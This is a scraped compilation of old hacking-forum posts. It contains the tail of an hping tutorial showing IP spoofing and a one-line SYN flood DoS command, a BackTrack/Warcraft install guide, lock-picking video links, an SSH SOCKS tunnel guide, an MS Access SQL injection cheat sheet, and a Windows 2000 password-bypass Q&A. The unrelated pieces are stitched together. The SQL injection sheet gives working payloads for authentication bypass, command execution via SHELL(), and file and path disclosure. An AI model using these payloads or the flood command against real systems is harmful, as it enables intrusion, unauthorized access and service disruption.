--- 66.94.234.13 hping statistic ---
161083 packets tramitted, 1 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---------------------------------------------------------------------
As you can see here we used the -a option to spoof our ip address. We also
chose to combine scan types with -SA which is a SYN/ACK scan. To see if my
ip address was being spoofed I ran a session of tcpdump.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # tcpdump -i wlan0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlan0, link-type EN10MB (Ethernet), capture size 96 bytes
00:14:03.969419 IP 192.168.1.100.29664 > w2.rc.vip.scd.yahoo.com.27299: S 247614302:247614302(0) ack 1324676282 win 512
00:14:03.971087 IP 192.168.1.100.29665 > w2.rc.vip.scd.yahoo.com.27300: S 1843027743:1843027743(0) ack 503065324 win 512
---------------------------------------------------------------------
Just as I expected my ip is being spoofed "IP 192.168.1.100.29664".
Lets try some firewall, traceroute action. First lets use nmap to scan a port.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # nmap -sS 69.147.122.169 -p 25
Starting Nmap 4.50 ( http://insecure.org ) at 2007-12-24 00:52 EST
Interesting ports on srp42r2.flickr.re2.yahoo.com (69.147.122.169):
PORT STATE SERVICE
25/tcp filtered smtp
Nmap done: 1 IP address (1 host up) scanned in 1.489 seconds
---------------------------------------------------------------------
It seams this port is behind some kind of a firewall. Lets test it with hping and
a couple of new options:
-t sets initial ttl in the IP header
-z binds the “ctrl+z” key combination to the ttl, meaning every time
you press “crtl+z” the TTL field is increased.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping -I wlan0 -z -t 6 -S 69.147.122.169 -p 25
HPING 69.147.122.169 (wlan0 69.147.122.169): S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=172.22.32.217 name=UNKNOWN
7: TTL 0 during transit from ip=216.206.221.149 name=atl-edge-18.inet.qwest.net
8: TTL 0 during transit from ip=205.171.21.161 name=atl-core-01.inet.qwest.net
9: TTL 0 during transit from ip=67.14.8.206 name=cer-core-02.inet.qwest.net
10: TTL 0 during transit from ip=205.171.139.118 name=chp-brdr-02.inet.qwest.net
12: TTL 0 during transit from ip=66.110.27.90 name=if-5-0-0-720.core2.DTX-Dallas.teleglobe.net
13: TTL 0 during transit from ip=66.198.2.10 name=ix-4-1.core2.DTX-Dallas.teleglobe.net
14: TTL 0 during transit from ip=216.115.101.144 name=so-4-1-0.pat1.dce.yahoo.com
15: TTL 0 during transit from ip=216.115.108.61 name=ge-3-1-0-p150.msr2.re1.yahoo.com
16: TTL 0 during transit from ip=206.190.41.73 name=te4-1.bas-b2.re2.yahoo.com
17: len=40 ip=69.147.122.169 ttl=255 id=31610 sport=25 flags=SA seq=0 win=0 rtt=0.0 ms
len=40 ip=69.147.122.169 ttl=255 id=21098 sport=25 flags=SA seq=0 win=0 rtt=0.0 ms
len=40 ip=69.147.122.169 ttl=255 id=2613 sport=25 flags=SA seq=0 win=0 rtt=0.0 ms
---------------------------------------------------------------------
As you can see above we reached the server in 11 extra hops.
Using hping as a DOS tool can be as easy as 2 options.
-a option to spoof your address
-i indicates your intervals in microseconds (-i u1000)
hping2 -I wlan0 -a 192.168.1.100 -S 192.168.1.104 -p 6667 -i u1000
I hope you learned something about the basic workings of hping from this
tutorial. I encourage you to check out all the options and techniques
hping has to offer.
visit darkc0de.com, thanks d3hydr8[at]darkc0de[dot]com
Hping Options:
usage: hping host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set dont fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)

bT3 Installed and with warcraft 3

4 hours TT me noob
STEP 1:

#Download and install backtrack 3 burn it to a disk
#Launch backtrack 3 live:
mount
umount /dev/hda1 # or sda1
#umount /anyother/partions#
fdisk
n
p #just put in a partion somewhere if you know what to do
1 # or first available
w
reboot
STEP 2:

mount
umount /dev/hda1
mke2fs /dev/hda1
mkdir /mnt/backtrack
mount /dev/hda1 /mnt/backtrack
# Launch GUI
#Field 1: alraedy set
#Field 2: /mnt/backtrack
#Field 3: /dev/hda # or /dev/sda whichever applies
#Uncheck the restore checkbox ASSUMING YOU HAVE NO PREVIOUS OS
#INSTALLED
#CLICK INSTALL
reboot
STEP 3 IS ONLY NECESSARY IF YOUR HARDWARE DOESN'T NATIVELY SUPPORT DIRECT 3D MOST DON'T!
STEP 3:

#GO HERE AND FOLLOW THE INSTRUCTIONS
#MAKE SURE TO SET A VIRTUAL DESKTOP PReferably 640x480
http://wine-review.blogspot.com/2007/11/directx-90c-on-linux-with-wine.html
AND/OR
STEP 3:

#Get a 1/2gig usb drive plug it into a windows installation with direct X
#Copy everything in system32 or just the files
#go back to backtrack3
#copy all the files in system 32 into
#/root/.wine/c_drive/windows/system32
STEP 4: OR IGNORE AND DO SIX AND THEN FIVE

#Install war3
cd /path/tocd/
wine install.exe
#... this is pretty straight forward
STEP 5:

#GET AWC
http://www.freewebs.com/superbug77/AWC.rar
#GET FREEBSD RAR COMMANDLINE
http://www.win-rar.com/index.php?id=160&dl=rarbsd-3.7.1.tar.gz
#DO STUFF
tar -xvf rarbsd-3.7.1.tar.gz
unrar e AWC.rar /root/AWC
cd AWC
wine AWC.exe
#Configure LOWEST GRAPHICAL SETTINGS AND
#Unset the option in graphics specifically mentioned for opengl
STEP 6:

#Update warcraft due to the fact that warcraft tries to restart wc3 which just
#massively fucks shit up
#Trying to update it is a lost cause BUT WASTE YOUR TIME IF YOU WANT!
#You might have luck with making xwindows control it....probably not

# I advise you to transfer the files from and updated war3 install that are #patched
and copy
#IF you skipped 4 just copy everything and you are set
#IF you did 4 then well great
STEP 7:

cd "/root/.wine/drive_c/Program Files/Warcraft III"
wine "Frozen Throne.exe" -opengl
And get ready for the lag

28 lock picking video tutorials

Club combo lock
http://youtube.com/watch?v=bwVOCTSY_7g
Tubular lock picking
http://www.youtube.com/watch?v=f0ULLsSABXM&NR=1
Pick lock of Abloy 900
http://www.youtube.com/watch?v=9wZCO1bPOis&NR=1
Lock pick of Abloy SL 900 and SL 901
http://www.youtube.com/watch?v=spIoXNdW240
Lock pick of CISA
http://www.youtube.com/watch?v=ZIbE646cdlg
Lockpicking an AZBE lock (ASSA ABLOY GROUP)
http://www.youtube.com/watch?v=EPRa-gMpuLY
Pick lock of Yale ML 04
http://www.youtube.com/watch?v=SLL0AKwCzA0
Picking an old Assa industrial
http://www.youtube.com/watch?v=q1Ojswx6_t8
Lockpicking a TESA TE5 Security lock
http://www.youtube.com/watch?v=dUbNhbjT8gU
Kwikset Lockpick
http://www.youtube.com/watch?v=Elsk5QVulYQ
Lockpicking a 6 pin MCM Dimple Security lock
http://www.youtube.com/watch?v=7n8BhqLJl2c
Lockpicking a Dimple Lock
http://www.youtube.com/watch?v=8qOp4Xn7JVE
Lockpicking a ABUS C83 Lock and ABUS 85/40 Padlock
http://www.youtube.com/watch?v=c2MRi0Lk1aM
Lockpicking a ABUS Bond Lock
http://www.youtube.com/watch?v=btxcqGxEV0w
Abus 65/50 padlock
http://www.youtube.com/watch?v=5wd8lnA8PE0
lockpicking a Abus 65/40 brass padlock
http://www.youtube.com/watch?v=nrosMmzyz3g
Lockpicking a ABUS 65/30 Lock
http://www.youtube.com/watch?v=1cOqmrfTSyQ
How to pick a Master Lock #175
http://www.youtube.com/watch?v=jCz3_ladHNM
Lock Pick Master lock #3
http://www.youtube.com/watch?v=OADFuzQ6CAI
Master Lock no. 1
http://www.youtube.com/watch?v=YJoBn90mGHU
Lock Picking : Brinks High Security Padlock
http://www.youtube.com/watch?v=uNVGuR-szi4
Lockpicking : No 140 Masterlock
http://www.youtube.com/watch?v=wWjjeacyboM
Unlocking the Master 47
http://www.youtube.com/watch?v=VnhyFpvSbs4
Dudley Padlock Picked
http://www.youtube.com/watch?v=3Ghf5PR2lBU
"How-to": Crack a combination lock
http://www.youtube.com/watch?v=BA6zN7GZlCQ
How Safe Dialing Works
http://www.youtube.com/watch?v=VdCADFapBuI
Open an AXA bike lock with a blank key (Doh)
http://www.youtube.com/watch?v=K4SUSt2cwEk
Masterlock #17
http://www.youtube.com/v/FfzqV3mFxk8

SSH Tunneling - Socks4

[Written by D3hydro]
SSH Tunneling - Setting up a SOCKS proxy.
This tutorial is aimed at people with secure shell access who want to use this ssh connection to setup a reliable SOCKS4.
This doesn't matter on UID or anything, can be limited, root.. whatever as long as it's an SSH connection to the server.
WHAT YOU WILL NEED
SSH access on a server.
PuTTy
Start up PuTTy and type in the connection info. Hostname and port as usual.
Once that is done, don't start the connection. Look down the menu on the left hand side, and click on SSH then inside: Tunnels
Now underneath the box destination, tick the checkbox 'Dynamic' and leave the check box below set as Auto
Now look above and in the box called source port, type 1080. Once this is done press add.
Now connect as you would usually to this SSH server and LOGIN as normal.
Once you've logged in the socks proxy is up! the socks4 stays up as long as the ssh connection is active.
Now in the app of your choice e.g FireFox; add the socks 4 proxy. Add the hostname localhost and the port 1080.
You are now surfing securely through the servers connection rather than your own.
Enjoy.
D3hydro

Access SQL injection

================================================== ==========================
% Access SQL Injection
% brett.moore_at_security-assessment.com
================================================== ==========================
Nothing new here, move along..
************************************************** **************************
% MS Access system tables
************************************************** **************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
************************************************** **************************
% MS Access command execution, (older versions only)
************************************************** **************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = SHELL("cmd.exe /c dir > c:\test.txt")
pass = test
************************************************** **************************
% Auth Bypass, Basic
************************************************** **************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
************************************************** **************************
% Auth Bypass, Simple
************************************************** **************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in
'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.m db'
pass = 0test
[Union Notes]
Remeber when using unions the sort order can affect the first record
returned.
************************************************** **************************
% System Path Disclosure
************************************************** **************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
cannot
open the file 'C:\WINNT\system32'. It is already opened exclusively by
another user,
or you need permission to view its data.
************************************************** **************************
% Verify File Exists
************************************************** **************************
[Sql String - non-existant file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existant]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.
************************************************** **************************
% Verify Path Exists
************************************************** **************************
[Sql String - non-existant path]
test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid
path.
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.
[Sql String - existant path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'.

Bypass password logon in windows 2000

How do I bypass password logon in Windows 2000? The password has been forgotten by both the administrator and the user. QUESTION POSED ON: 26 APR 2001
I'm sorry to say that there is no way to really "bypass" the password login. This is something built-in to Windows 2000 (since the first Windows NT). If you have lost the password and need to gain access to the system, here are a few possible solutions.
You could try to "crack" it or to forcefully reset it to something you know. To crack the password, you would need a copy of the database and use a tool like L0phtCrack to brute-force the password.
You can also use a product called "Locksmith" from Winternals at www.winternals.com. Here is a description of their product from their website:
"Locksmith allows the administrator password to be replaced in cases when it has been lost or forgotten, and works even when the administrative account has been renamed."
You could be interested in the Windows 2000 Autologon feature. With this feature, you can start up a computer and automatically have it logon to an account you specify. Of course, I would consider this a security risk.
Here are the instructions from TechNet:
WARNING: Using Registry Editor incorrectly can cause serious, system-wide problems that may require you to reinstall Windows NT to correct them. Microsoft cannot guarantee that any problems resulting from the use of Registry Editor can be solved. Use this tool at your own risk.
1. Start REGEDT32.EXE and locate the following Registry subkey:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon
2. Using your account name and password, double-click the DefaultUserName entry, type your user name, and the click OK. Double-click the DefaultPassword entry, type your password, and then click OK.
Note: The DefaultPassword value may not exist. If it doesn't, from the Edit menu, choose Add Value. In the Value Name field, type: "DefaultPassword" (without the quotation marks). Select REG_SZ for the Data Type. In the String field, type your password. Save your changes.
Also, if no DefaultPassword string is specified, Windows NT automatically changes the value of the AutoAdminLogon key from 1 (true) to 0 (false), thus disabling the AutoAdminLogon feature.
3. From the Edit menu, choose Add Value. Enter AutoAdminLogon in the Value Name field. Select REG_SZ for the Data Type. Enter 1 in the String field. Save your changes.
4. Exit REGEDT32.
5. Click Start, click Shutdown, and then click OK. Turn off your computer.
6. Restart your computer and Windows NT. You should be able to logon automatically.
Note: To bypass the AutoAdminLogon process, and to logon on as a different user, hold down the SHIFT key after a logoff or after a Windows NT restart.
Note that this only applies to the first logon. To enforce this setting for subsequent logoffs, the administrator needs to set:
Key: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon
Value: ForceAutoLogon
Type: REG_SZ
Data: 1